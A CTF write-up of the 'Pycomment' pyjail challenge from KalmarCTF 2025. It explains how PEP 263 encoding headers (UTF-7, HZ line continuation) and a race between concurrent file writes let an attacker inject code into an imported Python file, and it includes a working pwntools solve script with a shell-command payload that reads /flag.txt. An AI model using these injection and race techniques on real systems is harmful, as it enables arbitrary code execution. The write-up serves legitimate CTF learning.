"Pycomment" from KalmarCTF 2025

Pycomment (misc, 2 solves)

In this writeup, I will share how I solved "Pycomment" from KalmarCTF 2025. It was one of the tougher pyjails this year and makes use of two really unique ideas.

Thanks for the challenge, @ChattyPlatinumCool 😛

Description

Can you please help us comment our code? And please don't attack us.
https://lab5.kalmarc.tf

Attachments: pycomment.zip

Challenge

In code_to_comment.py:

#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiasco
# displayed below. As we all know, when we write python, we should
# closely follow the zen of python. Just to refresh your mind, I'll
# share the most important lines with you again:
"""
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
"""

# Extra safety, make sure no code is run:
quit()

def wish_printer():
    #
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)

In server.py:

import string

banner = r"""
 _______         _______ _______ _______ _______ _______ _      _________
(  ____ |\     /(  ____ (  ___  (       (       (  ____ ( (    /\__   __/
| (    )( \   / | (    \| (   ) | () () | () () | (    \|  \  ( |  ) (
| (____)|\ (_) /| |     | |   | | || || | || || | (__   |   \ | |  | |
|  _____) \   / | |     | |   | | |(_)| | |(_)| |  __)  | (\ \) |  | |
| (        ) (  | |     | |   | | |   | | |   | | (     | | \   |  | |
| )        | |  | (____/| (___) | )   ( | )   ( | (____/| )  \  |  | |
|/         \_/  (_______(_______|/     \|/     \(_______|/    )_)  )_(   """.strip('\n')

print(banner + '\n\n')

print('Recently we made some budget cuts and had to let some developers go.')
print("Unfortunately, we realised too late that a large portion of our codebase is lacking comments.")
print("We've decided to crowd source the process of commenting our code.")
print("This program allows people from all over the internet to safely add comments to our codebase, so the remaining developers know what our code is doing.")

with open('code_to_comment.py', 'r') as rf:
    source = rf.read()
lines = source.split('\n')

print(f"\nHere's the code that we don't understand:\n```\n{source}\n```\n")
print("Would you be so kind to add useable comments?\n")

ALLOWED_CHARACTERS = string.ascii_letters + string.digits + string.punctuation + ' '

# Loop over lines and let user edit comments:
for i, line in enumerate(lines):
    if i == 0: # We ignore the shebang line of course
        continue
    if not line.lstrip().startswith('#'):
        continue
    print(f'Line {i} is a comment. Currently it is `{line}`. What would you like to append?')
    user_input = input('> ')
    if not all(c in ALLOWED_CHARACTERS for c in user_input):
        print('Make sure to not use any funky characters! We want readable comments!')
        continue
    new_line = line + user_input
    if len(new_line) > 72:
        print('Comment too long! Make sure to follow PEP-8!')
        continue
    lines[i] = new_line

# Write new file
new_python_file = '\n'.join(lines)
with open('commented_code.py', 'w') as wf:
    wf.write(new_python_file)

print(f"\nCommented code succesfully written to file. Here's the code:\n```\n{new_python_file}\n```\n")

# Let's make sure the file is not broken:
try:
    __import__('commented_code')
except SyntaxError as e:
    print('SyntaxError:', str(e))
    quit()

print('Yay, no errors! Thanks for commenting our code!')

Overview

We are given a server that lets us add comments to an existing Python script (code_to_comment.py). The commented result is saved to a new file (commented_code.py), which is then executed with __import__('commented_code').

We can only append text to lines that are already comments: lines 2, 3, 4, 5, 14, and 18 (the shebang on line 1 is skipped). Note that the server counts from 0, so its prompts call these lines 1, 2, 3, 4, 13, and 17.

To stop users from injecting malicious code, the server imposes some restrictions on the comments (input that breaks either rule is silently discarded and the line is left unchanged):

Only printable ASCII is allowed, i.e. letters, digits, punctuation and ' '.
Each line must not exceed 72 characters, so that it follows "PEP-8 guidelines".

Magic headers

At first glance, this seems impossible, since anything we append ends up inside a comment and is ignored. However, anyone seasoned with the quirks of Python will know about magic headers (encoding declarations), as documented in PEP 263. Any Python file whose first or second line matches this regular expression:

^[ \t\f]*#.*?coding[:=][ \t]*([-_.a-zA-Z0-9]+)

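causes the entire file to be decoded with that encoding before it is parsed. (The second line only counts if the first line is blank or a comment, which a shebang is.)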
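To see this in action, the sketch below asks the standard library's tokenize.detect_encoding(), which implements this PEP 263 lookup, which codec it would pick for three small made-up sources. The second one hides the declaration at the end of an ordinary comment on line 2, right after a shebang; the third shows that a declaration on line 2 is ignored when line 1 is code:

```python
import io
import tokenize


def declared_encoding(source: bytes) -> str:
    """Return the encoding Python would use to decode this source file."""
    encoding, _ = tokenize.detect_encoding(io.BytesIO(source).readline)
    return encoding


plain = b"#!/usr/bin/env python3\nprint('hi')\n"
sneaky = b"#!/usr/bin/env python3\n# some ordinary comment, coding=hz\nprint('hi')\n"
ignored = b"print('hi')\n# coding=hz\n"  # line 1 is code, so line 2 is never checked

print(declared_encoding(plain))    # utf-8
print(declared_encoding(sneaky))   # hz
print(declared_encoding(ignored))  # utf-8
```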

For example, this trick was used in "AaaS" from MapleCTF 2023 to bypass a pyjail:

#coding=u7
+AGEAPQBfAF8AaQBtAHAAbwByAHQAXwBfACgAJwBvAHMAJwApAC4AcABvAHAAZQBuACgAJwBjAGEAdAAgAC8AYQBwAHAALwBmAGwAYQBnAC4AdAB4AHQAJwApAC4AcgBlAGEAZAAoACk

(if you decode the long string as UTF-7, it runs a shell command that reads flag.txt)

Since line 2 of code_to_comment.py is a comment, we can append this magic header to the end of that line:

#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiascoding=u7
...

Notice that we reuse the trailing co of fiasco, so only ding=u7 needs to be appended. The regex doesn't care what comes before coding, so this is perfectly valid, and the line ends at exactly 72 characters! If not for this massive "coincidence", this trick would not be possible.
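As a sanity check, this sketch copies the server's two input checks and the PEP 263 regex from above and runs them on line 2 (check_append is a hypothetical helper written for this example). It also shows that spelling out a longer name such as utf7 would not fit:

```python
import re
import string

# Copied from server.py and from the PEP 263 regex above.
ALLOWED_CHARACTERS = string.ascii_letters + string.digits + string.punctuation + ' '
CODING_RE = re.compile(r'^[ \t\f]*#.*?coding[:=][ \t]*([-_.a-zA-Z0-9]+)')

LINE_2 = '# We would like to extend our sincere apologies due to the fiasco'


def check_append(line, user_input):
    """Return (new_line, declared_encoding) if server.py would accept user_input, else None."""
    if not all(c in ALLOWED_CHARACTERS for c in user_input):
        return None
    new_line = line + user_input
    if len(new_line) > 72:
        return None
    match = CODING_RE.match(new_line)
    return new_line, (match.group(1) if match else None)


print(len(LINE_2))                          # 65
print(check_append(LINE_2, 'ding=u7')[1])   # u7
print(check_append(LINE_2, 'ding=utf7'))    # None (74 characters)
```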

Messing with UTF-7

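UTF-7 decoding works (roughly) by looking for runs of the form +BASE64STRING-, base64-decoding the part in between, and interpreting the result as UTF-16BE; everything outside such runs is passed through as ASCII. The important thing to realize is that the source code is decoded first and parsed afterwards, so anything the decoder produces, including newlines, is seen by the parser as if it had been written literally.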

Therefore, if we encode \nPAYLOAD as UTF-7 and append that to one of the comment lines, the decoded newline should end the comment, and PAYLOAD should run when the file gets imported. We can apply this once to override quit(), and once more to call breakpoint().
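Here is a minimal sketch of building such a string (utf7_shift is a made-up helper, and print(1) stands in for the real payload). Because a raw newline is not in ALLOWED_CHARACTERS, and Python's own UTF-7 encoder emits newlines as literal \n bytes, the newline has to be forced into a base64 run by hand:

```python
import base64
import string

ALLOWED_CHARACTERS = string.ascii_letters + string.digits + string.punctuation + ' '


def utf7_shift(text: str) -> str:
    """Encode every character of text inside a single UTF-7 base64 run."""
    b64 = base64.b64encode(text.encode('utf-16-be')).decode('ascii')
    return '+' + b64.rstrip('=') + '-'  # UTF-7 drops the '=' padding; '-' ends the run


smuggled = utf7_shift('\nprint(1)')
print(smuggled)
print(all(c in ALLOWED_CHARACTERS for c in smuggled))  # True
print(repr(smuggled.encode('ascii').decode('utf-7')))  # '\nprint(1)'
```

The result only uses base64 characters plus + and -, all of which pass the server's character filter.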

So, are we done? Unfortunately not: importing the file fails with the following error:

'utf7' codec can't decode bytes in position 640-641: ill-formed sequence (wow.py, line 0)

The culprit is the third line of this function, which cannot be decoded as UTF-7:

def wish_printer():
    #
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)

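The problem is the +: in UTF-7, a + must be followed either by - (the escape for a literal +) or by a base64 character that starts a shifted run. Here it is followed by a space, which the decoder rejects as an ill-formed sequence. Since that line is not a comment, we cannot touch it, and as far as I am aware there is no way to circumvent this error. I even tried digging into the decoder's source code, but to no avail.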
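The failure is easy to reproduce on that single line. In this sketch, utf7_error is a throwaway helper that returns the UnicodeDecodeError (if any); it also shows that +- is how UTF-7 spells a literal +, which would only help if we were allowed to edit that line:

```python
def utf7_error(data: bytes):
    """Return the UnicodeDecodeError raised when decoding data as UTF-7, or None."""
    try:
        data.decode('utf-7')
    except UnicodeDecodeError as exc:
        return exc
    return None


line = b"    wish = 'Kalmar says' + ' cheers!!'"
err = utf7_error(line)
print(err.reason)                     # ill-formed sequence
print(line[err.start:err.start + 2])  # b'+ '

# '+-' is how UTF-7 spells a literal '+', but we are not allowed to edit this line.
print(utf7_error(b"'Kalmar says' +- ' cheers!!'"))  # None
```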

Other encodings

Since u7 didn't seem to work, I started looking into other potential encodings. Line 2 is 65 characters long and appending ding= brings it to 70, so with the 72-character limit the encoding name can be at most two characters long. A quick enumeration shows that only these encodings are possible:

hz l1 l2 l3 l4 l5 l6 l7 l8 l9 r8 us u7 u8

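Apart from u7, every candidate decodes printable ASCII unchanged (they are ASCII, UTF-8, or single-byte ISO 8859 and Roman-8 variants), so the only other encoding with interesting behavior is hz. I couldn't find any documentation in the Python docs on how it works (the underlying format is HZ, specified in RFC 1843), but it is implemented in cjkcodecs/_codecs_cn.c#L410: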

while (inleft > 0) {
    unsigned char c = INBYTE1;
    Py_UCS4 decoded;

    if (c == '~') {
        unsigned char c2 = INBYTE2;

        REQUIRE_INBUF(2);
        if (c2 == '~' && state->c[CN_STATE_OFFSET] == 0)
            OUTCHAR('~');
        else if (c2 == '{' && state->c[CN_STATE_OFFSET] == 0)
            state->c[CN_STATE_OFFSET] = 1; /* set GB */
        else if (c2 == '\n' && state->c[CN_STATE_OFFSET] == 0)
            ; /* line-continuation */
        else if (c2 == '}' && state->c[CN_STATE_OFFSET] == 1)
            state->c[CN_STATE_OFFSET] = 0; /* set ASCII */
        else
            return 1;
        NEXT_IN(2);
        continue;
    }
    ...
}

Playing around with it gives us a pretty good idea of how it works:

>>> b'~{aa~}'.decode('hz')
'後'
>>> b'~{aabb~}'.decode('hz')
'後忖'
>>> b'~{1234~}'.decode('hz')
'辈炒'
>>> b'~{1234~}hello'.decode('hz')
'辈炒hello'
>>> b'~{'.decode('hz')
''

However, inside ~{ ... ~} every pair of bytes is decoded as a GB2312 character, so it seems we can only produce Chinese characters, whereas we need a newline in order to escape the comment.
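To make the state machine concrete, here is a rough Python transliteration of the decoder loop quoted above (hz_decode_model is a hypothetical name, and it only models strict error handling). In GB mode it mirrors the C table lookup by setting the high bit of both bytes and decoding them with Python's EUC-based gb2312 codec, which reads the same GB2312 table; the comparison against the real hz codec at the end is the only check of that assumption:

```python
def hz_decode_model(data: bytes) -> str:
    """Rough model of CPython's HZ decoder (strict errors only)."""
    out = []
    gb_mode = False  # mirrors state->c[CN_STATE_OFFSET]: False = ASCII, True = GB
    i = 0
    while i < len(data):
        c = data[i]
        if c == ord('~'):
            c2 = data[i + 1:i + 2]  # empty if '~' is the last byte
            if c2 == b'~' and not gb_mode:
                out.append('~')      # '~~' is an escaped tilde
            elif c2 == b'{' and not gb_mode:
                gb_mode = True       # '~{' switches to GB2312 mode
            elif c2 == b'\n' and not gb_mode:
                pass                 # '~\n' is a line continuation: emits nothing
            elif c2 == b'}' and gb_mode:
                gb_mode = False      # '~}' switches back to ASCII mode
            else:
                raise ValueError(f'invalid HZ escape at offset {i}')
            i += 2
            continue
        if c & 0x80:
            raise ValueError(f'8-bit byte at offset {i}')
        if not gb_mode:
            out.append(chr(c))       # ASCII mode: bytes pass through unchanged
            i += 1
        else:
            pair = data[i:i + 2]
            if len(pair) < 2 or pair[1] & 0x80:
                raise ValueError(f'bad GB2312 pair at offset {i}')
            # HZ stores GB2312 with the high bits cleared; restore them for the EUC codec
            out.append(bytes([pair[0] | 0x80, pair[1] | 0x80]).decode('gb2312'))
            i += 2
    return ''.join(out)


for sample in [b'~{aa~}', b'~{1234~}hello', b'run:~\nquit()']:
    print(sample, repr(hz_decode_model(sample)), repr(sample.decode('hz')))
```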

But after I revisited the source code, I noticed something interesting about one of the branches:

else if (c2 == '\n' && state->c[CN_STATE_OFFSET] == 0)
    ; /* line-continuation */

In ASCII mode, this branch causes ~\n to decode to nothing, which turns out to be useful! If we append ~ to the end of a comment line, the next line gets joined onto the end of the comment. And so,

# Extra safety, make sure no code is run:~
quit()

becomes

# Extra safety, make sure no code is run:quit()

So we can comment out quit(). Unfortunately, this alone does not let us insert an arbitrary payload. We would somehow need a way to combine the utility of u7 and hz...
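To confirm the quit() trick end to end, the sketch below parses a trimmed-down version of the commented file (the docstring block is left out to keep it short, so the line numbers differ from the real file). It uses ast.parse(), which, like the import machinery, hands the raw bytes to compile(), so the coding=hz declaration is honored:

```python
import ast

# Trimmed-down commented_code.py: "ding=hz" appended to line 2 and "~" appended to
# the "Extra safety" comment. The docstring block is left out for brevity.
SOURCE = b"""#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiascoding=hz

# Extra safety, make sure no code is run:~
quit()

def wish_printer():
    #
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)
"""

decoded = SOURCE.decode('hz')
print(decoded.splitlines()[3])  # # Extra safety, make sure no code is run:quit()

# ast.parse() passes the bytes to compile(), which applies the coding declaration.
tree = ast.parse(SOURCE)
print([type(node).__name__ for node in tree.body])  # ['FunctionDef']
```

The only top-level statement left is the function definition: quit() has become part of the comment.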

One more trick

We actually need one more trick in order to solve this challenge, and from a pyjail perspective, it is not an obvious thing to look for. The idea stems from this part of the code:

new_python_file = '\n'.join(lines)
with open('commented_code.py', 'w') as wf:
    wf.write(new_python_file)

print(f"\nCommented code succesfully written to file. Here's the code:\n```\n{new_python_file}\n```\n")

# Let's make sure the file is not broken:
try:
    __import__('commented_code')
except SyntaxError as e:
    print('SyntaxError:', str(e))
    quit()

The Dockerfile spawns processes via socat, so multiple instances can run concurrently, and every instance writes to the same relative path, commented_code.py. So what happens if two instances write to it at the same time? Does one write simply win, or can the file end up corrupted?

We can test this out with a simple fork() script:

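import os

pid = os.fork()
if pid == 0:
    # Child: open (truncating the file), then write 10 bytes
    with open('junk', 'w') as f:
        f.write('a' * 10)
    os._exit(0)
else:
    # Parent: open (truncating the file), then write 5 bytes
    with open('junk', 'w') as f:
        f.write('b' * 5)

    # Wait for the child so we read the final contents of the file
    os.waitpid(pid, 0)
    with open('junk', 'r') as f:
        print(f.read())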

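Most of the time it prints aaaaaaaaaa or bbbbb, but occasionally we get bbbbbaaaaa! This happens when both processes open (and truncate) the file before either one writes: each file handle has its own offset starting at 0, so the shorter write only overwrites the beginning of the longer one. So we have found a devastating file-write race condition.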
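The bad interleaving can be replayed deterministically inside a single process by holding two handles on the same file. This is a simulation of the race, not the race itself; overlapping_write is a made-up helper, and the file lives in a temporary directory:

```python
import os
import tempfile


def overlapping_write(first: str, second: str) -> str:
    """Replay the bad interleaving: both handles truncate the file before either writes."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, 'junk')
        with open(path, 'w') as f1, open(path, 'w') as f2:  # two independent offsets, both at 0
            f1.write(first)
            f1.flush()   # the first write lands in the file
            f2.write(second)
            f2.flush()   # the second write also starts at offset 0 and only covers the prefix
        with open(path) as f:
            return f.read()


print(overlapping_write('a' * 10, 'b' * 5))  # bbbbbaaaaa
print(overlapping_write('b' * 5, 'a' * 10))  # aaaaaaaaaa
```

Only the order "long file first, short file second" leaves a mixed result, which is exactly the case the exploit relies on.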

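We can now use this overlap to get code executed outside of the comment: if the longer file is written first and the shorter one lands on top of it, the result is the whole short file followed by the tail of the long one. It's now just a matter of choosing the padding so that this tail starts exactly at our payload.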

For the final solution, I crafted these two files:

#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiascoding=hz
# displayed below. As we all know, when we write python, we should
# closely follow the zen of python. Just to refresh your mind, I'll
# share the most important lines with you again:
"""
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
"""

# Extra safety, make sure no code is run:~
quit()

def wish_printer():
    #
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)

#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiascoAAAAAAA
# displayed below. As we all know, when we write python, we shouldAAAAAA
# closely follow the zen of python. Just to refresh your mind, I'llAAAAA
# share the most important lines with you again:AAAAAAAAAAAAAAAAAAAAAAAA
"""
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
"""

# Extra safety, make sure no code is run:AAAAAAAAAAAAAAAAAAAAAA
quit()

def wish_printer():
    #if __import__("os").system("cat /flag.txt"):
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)

When overlapped in the right way, they produce this new file:

#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiascoding=hz
# displayed below. As we all know, when we write python, we should
# closely follow the zen of python. Just to refresh your mind, I'll
# share the most important lines with you again:
"""
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
"""

# Extra safety, make sure no code is run:~
quit()

def wish_printer():
    #
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)
if __import__("os").system("cat /flag.txt"):
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)

Note that the coding=hz header is still necessary in order to comment out quit(), unless it is possible to cause the code that gets appended to execute before the quit() (I do not think this is possible, but let me know if you find a way!).
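To double-check the alignment, here's a sketch that rebuilds both files the way server.py would, overlays them as in the race, and parses the result with ast.parse() (which honors coding=hz just like __import__ does). simulate_server is a hypothetical helper mirroring the server's loop, and code_to_comment.py is assumed to end with exactly one trailing newline, which is what makes the offsets line up:

```python
import ast

# code_to_comment.py as shown at the top (assumed to end with a single newline).
ORIGINAL = '''#!/usr/bin/env python3
# We would like to extend our sincere apologies due to the fiasco
# displayed below. As we all know, when we write python, we should
# closely follow the zen of python. Just to refresh your mind, I'll
# share the most important lines with you again:
"""
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
"""

# Extra safety, make sure no code is run:
quit()

def wish_printer():
    #
    wish = 'Kalmar says' + ' cheers!!'
    print(wish)
'''


def simulate_server(appended):
    """Mimic server.py: append one string per comment line (shebang skipped), then join."""
    lines = ORIGINAL.split('\n')
    remaining = iter(appended)
    for i, line in enumerate(lines):
        if i == 0 or not line.lstrip().startswith('#'):
            continue
        new_line = line + next(remaining)
        assert len(new_line) <= 72, f'line {i + 1} too long'
        lines[i] = new_line
    return '\n'.join(lines)


prog_a = ['ding=hz', '', '', '', '~', '']
prog_b = ['A' * 7, 'A' * 6, 'A' * 5, 'A' * 24, 'A' * 22,
          'if __import__("os").system("cat /flag.txt"):']

file_a = simulate_server(prog_a)
file_b = simulate_server(prog_b)

# file_b is written first; file_a's shorter write then overwrites only its prefix.
merged = file_a + file_b[len(file_a):]

print(repr(file_b[len(file_a):].split('\n')[0]))
tree = ast.parse(merged.encode('ascii'))  # parsed only, nothing is executed
print([type(node).__name__ for node in tree.body])  # ['Expr', 'FunctionDef', 'If']
```

The 64 padding characters in prog_b are exactly what pushes the payload to offset len(file_a); changing any of them shifts the tail and breaks the alignment.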

Solve script

from pwn import *
from threading import Barrier, Thread

# Strings appended to the six comment lines (1-indexed lines 2, 3, 4, 5, 14, 18)
prog_a = [b'ding=hz', b'', b'', b'', b'~', b'']
prog_b = [b'A'*7, b'A'*6, b'A'*5, b'A'*24, b'A'*22, b'if __import__("os").system("cat /flag.txt"):']

def exploit(index):
    context.log_level = 'warn'
    lines = (prog_a, prog_b)[index]
    # with remote('localhost', 7531) as io:
    with remote('b01bc84d755b10a84ae212033fde623d-62103.inst5.chal-kalmarc.tf', 1337, ssl=True) as io:
        # Answer every prompt except the last one
        for line in lines[:-1]:
            io.sendlineafter(b'> ', line)
        io.recvuntil(b'> ')
        # Wait until every connection sits at its final prompt, then send the last
        # line at the same time so that the file writes overlap
        race_sync.wait()
        io.sendline(lines[-1])
        print(io.recvall().decode())

# 8 connections for each of the two files
indices = [0, 1] * 8
race_sync = Barrier(len(indices))

for i in indices:
    Thread(target=exploit, args=(i,)).start()

For the final solve script, I opened 16 connections in parallel (8 per file) to increase the chance of hitting the race condition. The flag got dumped after 4 or so attempts:

kalmar{thanks_for_commenting_my_coding_quickly_enough_to_win_that_race}

Lydxn/pycomment_writeup.md